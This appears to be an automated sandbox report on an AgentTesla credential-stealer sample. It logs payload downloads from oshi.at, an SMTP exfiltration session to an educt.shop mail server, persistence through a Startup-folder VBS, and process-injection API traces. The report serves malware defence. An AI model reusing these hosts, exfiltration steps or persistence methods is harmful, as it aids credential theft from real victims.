                                                                                                2025-01-06 06:58:44 UTC4096INData Raw: a1 9d fd df 6e cf 45 74 f5 d7 6a 84 a3 76 2d c7 0a d6 ac 61 4c 6b 1e 89 ae 48 bf bf 60 e8 ee 2f fb da 40 03 c7 31 c0 35 b3 ec 29 aa 08 25 e3 e5 79 60 84 f7 94 63 08 5f 9e ed 7f 8e ba 21 49 9d 66 1d 77 22 d9 51 01 50 d0 38 f0 e9 b2 e6 15 a7 1f 12 b0 57 3d 6a 85 78 62 4e af e2 b0 23 29 e7 1c 02 2a 61 18 eb e4 ed b3 97 9e ba c8 a8 d2 d1 cd 00 54 d4 9d eb 86 63 f4 0f c6 30 a8 25 b2 21 da fc 0b 1a 46 b5 99 32 c3 e5 3c 43 11 4a d9 18 74 fd cd af 13 c0 e0 7f da 2f 35 64 79 da 2f 3d 03 02 13 ad af b6 30 4c 09 5a 8c ce a1 17 38 bb ca 63 cd 45 1e da 05 87 44 d0 e4 0c d3 9b 3f 37 14 da ce a6 5e c9 1b f4 e5 14 34 41 6f 4f c5 44 eb 26 7d ff 99 e2 3c af 80 c5 1e 15 a6 08 e2 66 c7 aa d9 2f f9 cb be a4 3b b7 72 9f e2 f0 a9 d0 73 9e 4a e6 75 ba 01 e0 f5 29 39 7c f7 9e e4
                                                                                                Data Ascii: nEtjv-aLkH`/@15)%y`c_!Ifw"QP8W=jxbN#)*aTc0%!F2<CJt/5dy/=0LZ8cED?7^4AoOD&}<f/;rsJu)9|
                                                                                                2025-01-06 06:58:44 UTC4096INData Raw: 49 8c 8d 9a a2 22 d0 e6 57 a7 84 be 79 cd 40 e1 96 d4 73 8d f9 68 90 17 e5 2f f6 8d a3 7e d7 2e ab be d7 d2 d6 31 92 8e fc 99 e3 ff f6 73 1f 20 83 3b ca 9d 2c 4e 15 b8 33 32 85 e4 92 c4 6c 05 80 bc 03 b9 11 f6 89 f2 de e1 70 83 92 81 cb a9 36 30 98 c5 f4 ea 87 49 9b 82 04 54 65 67 54 a3 d3 aa 92 85 0d 58 5c 02 d4 57 ff 61 27 92 d2 cb bc 8d d1 63 39 77 0b 0f df 18 7b d3 37 6e 4a d6 85 ca 3a 30 d4 a7 da 6f 65 b5 0e 70 b4 de bb d8 10 c3 c5 1c ea 73 c1 ef c4 bb 56 a1 09 77 f5 d5 51 01 ff ae e5 69 bf d4 8a 4b b7 39 1e 2d 7f 7e f4 66 f8 be 4d ec e8 c5 45 79 66 4c a4 7b 50 13 be 0e 80 6f d4 ae 53 e4 2b f8 29 d4 78 e4 0b 6e e8 66 53 39 00 46 01 8c bc 35 e5 50 ce 47 dd 9b d5 b6 87 25 36 16 47 f8 6c 5c 66 26 9f 8f 1f 2e f3 3a d4 56 a8 66 b5 44 12 a4 c0 03 c0 d6 e6
                                                                                                Data Ascii: I"Wy@sh/~.1s ;,N32lp60ITegTX\Wa'c9w{7nJ:0oepsVwQiK9-~fMEyfL{PoS+)xnfS9F5PG%6Gl\f&.:VfD
                                                                                                2025-01-06 06:58:44 UTC4096INData Raw: 31 46 1b 4a b7 49 f9 6a 47 52 98 83 1d 1e 94 df a5 ca 5e ce 28 0e 26 1d 01 83 c0 f0 c6 b8 34 cb a8 df db 08 f2 64 e9 32 28 db ac 12 4e f1 b8 f3 fe 1b 13 58 93 86 9c 3b 5b a9 b6 bb 00 bd a7 76 ab e6 5b b5 af b3 cb 4b ac 67 f6 1c d8 a1 b5 6f 09 49 e6 a5 b1 89 ab be 08 2b 43 95 03 75 92 8f ab 18 f6 ad 4c b6 83 e4 b5 0c 32 2c f7 a3 9c 39 00 19 26 9f 28 b6 0f 21 12 58 ad b4 90 5d 95 72 69 a6 bf fb fb b9 89 1b 04 ca d7 55 be 94 5b 8b da 36 6b 16 57 e9 21 20 21 29 ff 20 79 5d 2b 68 59 f3 4f 5c 75 6a a9 37 9d 07 da 81 23 c6 d2 33 e0 eb d8 75 7b cb f4 a8 11 5c d3 a3 bb c2 4e d2 fe 33 57 86 f7 31 e0 71 44 33 2a ec 5b a2 6b 03 d5 e6 82 79 85 fc 5a c7 00 64 4e 11 97 ae ea 03 06 86 b2 c5 7e b2 75 88 12 8f 9c f5 60 cc 7a 2f 22 25 a4 aa 76 65 69 d0 24 cf 4d 18 0a de 86
                                                                                                Data Ascii: 1FJIjGR^(&4d2(NX;[v[KgoI+CuL2,9&(!X]riU[6kW! !) y]+hYO\uj7#3u{\N3W1qD3*[kyZdN~u`z/"%vei$M
                                                                                                2025-01-06 06:58:44 UTC4096INData Raw: 01 f4 a4 e7 0e 97 7c 31 e8 bb 68 1c d1 b4 47 f1 74 e1 22 d2 52 23 9b 1e 95 18 6d ba a4 f3 b9 2f 96 61 dd d7 8a e7 86 45 7d 3b aa da e3 c9 d3 d8 42 5c 1e 26 dd 19 ef e1 25 aa ba 8b 6e dc 3d fd bb 55 85 46 76 fc b8 04 e7 ef c2 ed 7a 02 3a a2 0a 3d 78 f6 01 e4 77 db 20 d7 06 b8 41 43 77 b2 7e ff bf fd d2 35 1a cc 80 a8 2f 4a 9d cb 34 4f 1c 64 13 79 42 72 e0 b9 16 39 9e 3a 67 88 36 00 49 91 74 9c b4 fd bc 7e c2 7c d2 e3 38 9a b9 68 5e 01 99 c5 6c 1d e1 5f 6b d0 f5 4d 42 fa f8 28 f9 05 06 a3 bb fc f9 0d 5b 21 3d 3b 2f 57 75 0b 2c ff 6c f2 59 b4 ac 8f bc 9a 53 8c 6e 65 25 76 d9 2d ca 8c 31 a5 42 28 11 44 f8 dc 76 d0 63 50 43 a4 05 87 82 2f ea 73 76 93 90 e3 a5 94 aa c3 96 5d 63 22 99 34 cf a5 c6 11 a4 3a ed 06 4f 9b 42 f5 07 d7 9a 41 70 20 a1 aa 8e 01 d1 9b 7f
                                                                                                Data Ascii: |1hGt"R#m/aE};B\&%n=UFvz:=xw ACw~5/J4OdyBr9:g6It~|8h^l_kMB([!=;/Wu,lYSne%v-1B(DvcPC/sv]c"4:OBAp
                                                                                                2025-01-06 06:58:44 UTC2234INData Raw: 01 d8 cb c2 8d 30 b0 67 34 85 4c b9 d3 58 09 b1 37 08 be d5 c3 56 8d 19 47 02 ee d9 1a b8 f5 7e a8 14 66 c7 20 39 53 eb 84 9b 8e 80 9d 3f 53 cc 9a 16 d2 41 a5 1b 58 19 51 95 a5 b4 03 60 71 aa 0f 72 e2 aa c9 56 25 b4 59 86 ad fb 60 71 4c ae 31 8b 72 7e 0a 05 7b 29 b7 3b 4d 37 4c 43 90 c6 ef e5 43 37 50 32 00 1b 9f 9e f4 27 4e af d5 f9 d1 c1 57 ba 5c ff 9c d6 1e 56 66 4b d7 83 f5 a1 11 42 1e e3 5b 86 34 1c 99 1c 03 9f 9f 34 e8 97 6c 37 e1 57 fb 57 be 3d 80 d8 c1 6d c4 28 bb f2 f3 f1 65 c3 76 05 1f 5c 47 66 b5 86 18 b6 fb fb 9e 24 78 f2 9b 06 53 35 a0 f7 a2 82 9a da 43 52 4b f2 60 40 d6 39 4c eb c6 a6 a0 60 d2 58 87 61 5b f0 a2 7a 20 c8 cb 59 02 cb 0d b3 97 d8 00 69 3b 1a 2e 97 ff 23 b8 d8 23 d8 e0 73 8c 13 49 ee 57 dd 55 f2 33 e7 0b 31 70 51 62 29 1a 61 21
                                                                                                Data Ascii: 0g4LX7VG~f 9S?SAXQ`qrV%Y`qL1r~{);M7LCC7P2'NW\VfKB[44l7WW=m(ev\Gf$xS5CRK`@9L`Xa[z Yi;.##sIWU31pQb)a!
                                                                                                2025-01-06 06:58:45 UTC4096INData Raw: c8 84 48 f4 2a 11 c7 b3 3e ca e6 5a 22 aa 3f 8a 28 4e 1a 1f 15 1a ed cb d0 e2 b9 7e eb c1 00 2f 7f 0e d9 75 a1 82 7f 9f 1f ab d4 65 7a ba 37 1d fb f9 54 00 e0 60 62 fa 78 cf 46 da b1 1b d0 c5 af a6 52 9a bb 32 3b 40 0d 0b 95 dd 9f 2c 51 cd e8 47 22 3d 45 ab 8f 7b a8 97 67 95 87 ca 11 2b e3 b1 b0 38 e6 8c b3 6c ac 57 62 f1 55 e5 78 32 88 ab 6e 66 c9 a3 2b 67 36 76 f4 f8 4e 49 d5 b1 a7 42 d2 82 8b de f0 d3 6b e0 2d 59 cb c3 64 5f 37 85 09 48 19 0e 1f 55 70 4a 64 3d 01 52 5a 5e 89 84 48 aa 1e 3a 6d 85 af d2 83 b0 d8 aa f7 42 e5 81 48 8f eb d6 77 74 99 a2 87 8c 93 58 22 25 b0 d0 44 70 03 3d 23 eb 3e 83 47 0e ca f8 d5 d1 79 2b 25 c2 22 a2 84 d6 59 42 70 53 ce f9 d2 aa 9e 40 3f 34 ba d3 38 7c a5 0d 41 e9 26 bf b7 08 71 c2 8c 68 09 3d 26 e3 e8 e0 5a bc e4 66 c3
                                                                                                Data Ascii: H*>Z"?(N~/uez7T`bxFR2;@,QG"=E{g+8lWbUx2nf+g6vNIBk-Yd_7HUpJd=RZ^H:mBHwtX"%Dp=#>Gy+%"YBpS@?48|A&qh=&Zf
                                                                                                2025-01-06 06:58:45 UTC4096INData Raw: 89 98 d2 31 33 ba 06 b2 43 e7 07 5e 77 5b 68 a0 b1 29 75 85 d3 c9 9c cb 56 9e 5d 9f c1 8e 67 90 09 35 ed 6f 37 fe 2c 60 f1 b1 ce 32 f6 f8 24 11 b9 ad 92 96 b8 0d d2 a5 da 57 fd 7a 16 f6 18 70 22 e5 2e 02 2c 39 9e 63 b3 33 c5 81 b6 4d 7a 99 ad 0b 3c 00 e4 f6 76 46 36 42 d9 59 cb d5 9c d4 6b 38 39 a7 e4 1a b7 24 8e 60 36 9a 7a 1b ea 49 1f c0 f5 e0 e5 41 04 f0 1b 1e 45 18 5a 5c 8a df 15 bf ce 64 6f 67 10 ef c6 5d d2 33 68 c6 a5 02 0b 0a 93 9c 90 b9 59 fd 7a 5e f6 28 6f ac d3 e0 4c fa ff 7d e5 c1 16 a4 0c 00 f9 fb 84 76 a3 e8 41 1c 06 0e 2e 39 ea a1 f2 cf 57 ef 98 8b de ca 4d 64 d5 f6 c1 1b 1a 64 f4 b5 22 bb 2e b6 b3 51 f8 e8 8e 7b 6f 3f b9 3b 09 7b b2 6c 62 47 5a c5 d7 2e 4c 6a c4 d2 7b 15 58 68 a1 0a b5 c0 8a d0 db 10 2f fb 60 79 70 e0 95 2d 24 3c 0d cf b2
                                                                                                Data Ascii: 13C^w[h)uV]g5o7,`2$Wzp".,9c3Mz<vF6BYk89$`6zIAEZ\dog]3hYz^(oL}vA.9WMdd".Q{o?;{lbGZ.Lj{Xh/`yp-$<
                                                                                                2025-01-06 06:58:45 UTC4096INData Raw: a4 20 bb b9 32 cb 7e 0e 82 92 d0 dd bb 73 72 34 36 8d fc af 8d 8b 19 cd c7 a4 66 57 b0 6d 13 f2 c4 f6 99 f4 4a 01 17 44 a8 c4 93 83 eb 0f 37 b0 4d e4 c8 d8 dc 50 1e b6 eb a4 61 59 c7 25 f3 e3 de ec 46 ca a8 da 84 0a 0c e1 fe ea 60 d5 8b cd e1 e9 0d 47 c8 be 88 6c 33 77 bc 23 ea 79 1a 75 5f 73 c3 5b 7b 93 3f 3f 82 b5 ab 76 2f e9 38 b6 5e 5f 16 ae 55 0e 44 35 05 53 67 0f f9 78 e1 72 b8 24 1e 8d 6a 88 b9 6c f6 22 c0 ba 0d fe 7c d5 f9 9f 4e 20 05 22 97 d8 16 77 02 2a 14 49 df c4 69 a6 d3 8b 30 7c 09 07 ee 57 7e 3b c2 73 6f 19 81 59 39 75 a6 66 d4 29 7a a5 fe 22 2a 73 ce 75 ee 9e f5 f3 11 0d 41 ef bf 61 1b a5 de 79 a9 ee 5c 37 c7 03 0c f2 b8 a6 3d 94 a7 e7 cf 09 cd d6 21 89 9d d3 8c a6 49 9f f2 4d 13 c4 b8 bd 80 9d e9 55 ed 43 c3 9b 17 45 9e 7e aa a4 a0 b1 39
                                                                                                Data Ascii: 2~sr46fWmJD7MPaY%F`Gl3w#yu_s[{??v/8^_UD5Sgxr$jl"|N "w*Ii0|W~;soY9uf)z"*suAay\7=!IMUCE~9
                                                                                                2025-01-06 06:58:45 UTC4096INData Raw: e3 ef ca 2a 00 75 33 a8 de 00 19 58 ec ef 34 32 dd 8d 29 f3 6d fa f7 19 e8 64 5b c1 4a d3 7d 03 fc 19 cb 6d 8b 1c c2 6b fd c3 2c 93 fa fc 86 44 e6 c8 2c 1c d9 20 8b 07 38 6b d1 3d 9e 9a 93 85 63 43 c9 e7 28 aa 14 1d 3f 7d 01 5d ef a2 5d 05 f5 9f 86 07 73 16 09 cc cf 20 89 5c 3c d0 a1 fa 6d 2b 09 22 0d 30 4f 1d 14 5e c2 9a f8 aa 5a a1 8b fb 50 6c 35 f3 c6 06 a7 10 cd a4 ee cd f9 ab c4 5a 40 b0 a8 be 19 84 eb ab f4 64 c1 7d a5 ee f6 2f a5 96 d4 c7 94 15 55 57 74 1b 6c ca 83 90 f8 6a 55 77 d4 ba 12 ec 60 be ef b4 cc 4b 49 e3 8c 84 f5 1c 82 0b 16 1a fb c7 41 52 6c f7 46 f9 4f ae bf f7 7c ac ee fc c0 65 09 f9 80 72 66 b1 aa 68 fd e8 8d d6 62 fe 70 3c 12 b2 5c f8 40 bd 25 0d 68 c7 fb 65 a7 30 44 af 78 01 3e 89 67 93 b4 6d 98 8a ae f1 23 ef db fe d9 6e 16 d2 0f
                                                                                                Data Ascii: *u3X42)md[J}mk,D, 8k=cC(?}]]s \<m+"0O^ZPl5Z@d}/UWtljUw`KIARlFO|erfhbp<\@%he0Dx>gm#n


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.6611145.253.86.154431364C:\Users\user\AppData\Roaming\Length.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:58:55 UTC162OUTGET /YBbz HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: oshi.at


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.6611155.253.86.154431364C:\Users\user\AppData\Roaming\Length.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:59:00 UTC162OUTGET /YBbz HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: oshi.at


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.6611165.253.86.154431364C:\Users\user\AppData\Roaming\Length.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:59:04 UTC162OUTGET /YBbz HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: oshi.at


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                10192.168.2.6611175.253.86.15443
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-06 06:59:08 UTC162OUTGET /YBbz HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                Host: oshi.at


                                                                                                SMTP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                Jan 6, 2025 07:57:14.933096886 CET58761095162.254.34.31192.168.2.6220 server1.educt.shop ESMTP Postfix
                                                                                                Jan 6, 2025 07:57:14.969300032 CET61095587192.168.2.6162.254.34.31EHLO 992547
                                                                                                Jan 6, 2025 07:57:15.142016888 CET58761095162.254.34.31192.168.2.6250-server1.educt.shop
                                                                                                250-PIPELINING
                                                                                                250-SIZE 204800000
                                                                                                250-ETRN
                                                                                                250-STARTTLS
                                                                                                250-AUTH PLAIN LOGIN
                                                                                                250-AUTH=PLAIN LOGIN
                                                                                                250-ENHANCEDSTATUSCODES
                                                                                                250-8BITMIME
                                                                                                250-DSN
                                                                                                250 CHUNKING
                                                                                                Jan 6, 2025 07:57:15.146552086 CET61095587192.168.2.6162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                                Jan 6, 2025 07:57:15.318233013 CET58761095162.254.34.31192.168.2.6334 UGFzc3dvcmQ6
                                                                                                Jan 6, 2025 07:57:15.503103018 CET58761095162.254.34.31192.168.2.6235 2.7.0 Authentication successful
                                                                                                Jan 6, 2025 07:57:15.507781982 CET61095587192.168.2.6162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                                                                Jan 6, 2025 07:57:15.679544926 CET58761095162.254.34.31192.168.2.6250 2.1.0 Ok
                                                                                                Jan 6, 2025 07:57:15.681883097 CET61095587192.168.2.6162.254.34.31RCPT TO:<ambro@educt.shop>
                                                                                                Jan 6, 2025 07:57:15.855175018 CET58761095162.254.34.31192.168.2.6250 2.1.5 Ok
                                                                                                Jan 6, 2025 07:57:15.855375051 CET61095587192.168.2.6162.254.34.31DATA
                                                                                                Jan 6, 2025 07:57:16.026880026 CET58761095162.254.34.31192.168.2.6354 End data with <CR><LF>.<CR><LF>
                                                                                                Jan 6, 2025 07:57:16.027684927 CET61095587192.168.2.6162.254.34.31.
                                                                                                Jan 6, 2025 07:57:16.320450068 CET58761095162.254.34.31192.168.2.6250 2.0.0 Ok: queued as BC2D16099A
                                                                                                Jan 6, 2025 07:58:54.316416979 CET61095587192.168.2.6162.254.34.31QUIT
                                                                                                Jan 6, 2025 07:58:54.488742113 CET58761095162.254.34.31192.168.2.6221 2.0.0 Bye

                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:01:54:58
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Ref#66001032.exe"
                                                                                                Imagebase:0x520000
                                                                                                File size:82'040 bytes
                                                                                                MD5 hash:74E7FAC7B65EF917CCF9A16A28E52663
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3526218119.0000000006420000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3486694329.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:01:57:09
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\excel_doc.xlsx"
                                                                                                Imagebase:0x890000
                                                                                                File size:53'161'064 bytes
                                                                                                MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:01:57:10
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                Imagebase:0x870000
                                                                                                File size:42'064 bytes
                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4610997762.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4610997762.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:10
                                                                                                Start time:01:57:21
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs"
                                                                                                Imagebase:0x7ff739e70000
                                                                                                File size:170'496 bytes
                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:11
                                                                                                Start time:01:57:21
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Users\user\AppData\Roaming\Length.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Length.exe"
                                                                                                Imagebase:0xc40000
                                                                                                File size:82'040 bytes
                                                                                                MD5 hash:74E7FAC7B65EF917CCF9A16A28E52663
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 34%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:12
                                                                                                Start time:01:58:23
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Windows\splwow64.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\splwow64.exe 12288
                                                                                                Imagebase:0x7ff7dfc90000
                                                                                                File size:163'840 bytes
                                                                                                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:13.5%
                                                                                                  Dynamic/Decrypted Code Coverage:97.5%
                                                                                                  Signature Coverage:1.9%
                                                                                                  Total number of Nodes:321
                                                                                                  Total number of Limit Nodes:13
                                                                                                  execution_graph 70090 641e920 70091 641e960 VirtualAlloc 70090->70091 70093 641e99a 70091->70093 69679 61dc788 69680 61dc79d 69679->69680 69682 61dc7b3 69680->69682 69683 61ddd28 69680->69683 69684 61ddd32 69683->69684 69688 56f20f8 69684->69688 69692 56f20ec 69684->69692 69689 56f214d CopyFileA 69688->69689 69691 56f224f 69689->69691 69693 56f214d CopyFileA 69692->69693 69695 56f224f 69693->69695 70073 61d6b58 70074 61d6b6d 70073->70074 70077 61d6c39 70074->70077 70079 61d6c49 70077->70079 70078 61d6ffc 70079->70078 70082 61d78d0 70079->70082 70086 61d78c8 70079->70086 70083 61d7918 VirtualProtect 70082->70083 70085 61d7953 70083->70085 70085->70079 70087 61d78d0 VirtualProtect 70086->70087 70089 61d7953 70087->70089 70089->70079 69696 25ed044 69697 25ed05c 69696->69697 69698 25ed0b7 69697->69698 69700 641df40 69697->69700 69701 641df68 69700->69701 69704 641e3d0 69701->69704 69702 641df8f 69705 641e3fd 69704->69705 69708 641e593 69705->69708 69709 641d4e8 69705->69709 69708->69702 69711 641d50f 69709->69711 69713 641d938 69711->69713 69714 641d980 VirtualProtect 69713->69714 69716 641d5cc 69714->69716 69716->69702 69717 26c7b40 69718 26c7b41 69717->69718 69719 26c7b6a 69718->69719 69723 641926d 69718->69723 69727 64182ad 69718->69727 69730 641342a 69718->69730 69724 641928c 69723->69724 69726 641d4e8 VirtualProtect 69724->69726 69725 64192b0 69726->69725 69729 641d4e8 VirtualProtect 69727->69729 69728 64101d1 69729->69728 69732 641d4e8 VirtualProtect 69730->69732 69731 6413442 69732->69731 69733 56f2cd0 69734 56f2ce5 69733->69734 69736 56f2cfb 69734->69736 69737 56f309d 69734->69737 69738 56f30a3 69737->69738 69742 56f4688 69738->69742 69752 56f4678 69738->69752 69739 56f2d72 69743 56f469d 69742->69743 69762 56f4b9d 69743->69762 69766 56f48d4 69743->69766 69770 56f4aa2 69743->69770 69774 56f46c9 69743->69774 69778 56f46d8 69743->69778 69782 56f4b4c 69743->69782 69786 56f475a 69743->69786 69744 56f46bf 69744->69739 69753 56f469d 69752->69753 69755 56f4b9d 10 API calls 69753->69755 69756 56f4b4c 10 API calls 69753->69756 69757 56f475a 10 API calls 69753->69757 69758 56f46c9 10 API calls 69753->69758 69759 56f46d8 10 API calls 69753->69759 69760 56f48d4 10 API calls 69753->69760 69761 56f4aa2 10 API calls 69753->69761 69754 56f46bf 69754->69739 69755->69754 69756->69754 69757->69754 69758->69754 69759->69754 69760->69754 69761->69754 69764 56f4743 69762->69764 69763 56f482d 69763->69744 69764->69763 69790 56f4f10 69764->69790 69768 56f4743 69766->69768 69767 56f482d 69767->69744 69768->69767 69769 56f4f10 10 API calls 69768->69769 69769->69768 69772 56f4743 69770->69772 69771 56f482d 69771->69744 69772->69771 69773 56f4f10 10 API calls 69772->69773 69773->69772 69776 56f46cc 69774->69776 69775 56f482d 69775->69744 69776->69775 69777 56f4f10 10 API calls 69776->69777 69777->69776 69780 56f46d9 69778->69780 69779 56f482d 69779->69744 69780->69779 69781 56f4f10 10 API calls 69780->69781 69781->69780 69784 56f4743 69782->69784 69783 56f482d 69783->69744 69784->69783 69785 56f4f10 10 API calls 69784->69785 69785->69784 69788 56f4743 69786->69788 69787 56f482d 69787->69744 69788->69786 69788->69787 69789 56f4f10 10 API calls 69788->69789 69789->69788 69791 56f4f14 69790->69791 69804 56f598e 69791->69804 69809 56f6534 69791->69809 69814 56f5553 69791->69814 69819 56f5d58 69791->69819 69824 56f65c4 69791->69824 69829 56f64b9 69791->69829 69836 56f54e9 69791->69836 69841 56f62ac 69791->69841 69846 56f5f6b 69791->69846 69851 56f5ccd 69791->69851 69856 56f5a3d 69791->69856 69805 56f599b 69804->69805 69861 56ff160 69805->69861 69865 56ff158 69805->69865 69806 56f630e 69810 56f6541 69809->69810 69811 56f5579 69809->69811 69811->69809 69869 56feb70 69811->69869 69873 56feb68 69811->69873 69815 56f555d 69814->69815 69816 56f6541 69815->69816 69817 56feb68 VirtualAllocEx 69815->69817 69818 56feb70 VirtualAllocEx 69815->69818 69817->69815 69818->69815 69820 56f5d67 69819->69820 69877 56fdf10 69820->69877 69881 56fdf08 69820->69881 69821 56f5e03 69825 56f65d3 69824->69825 69885 56fe5c8 69825->69885 69889 56fe5d0 69825->69889 69826 56f65ff 69830 56f64d1 69829->69830 69893 56f6b48 69830->69893 69917 56f6ba0 69830->69917 69941 56f6b90 69830->69941 69968 56f69f8 69830->69968 69831 56f64e9 69837 56f5579 69836->69837 69838 56f6541 69837->69838 69839 56feb68 VirtualAllocEx 69837->69839 69840 56feb70 VirtualAllocEx 69837->69840 69839->69837 69840->69837 69842 56f62b6 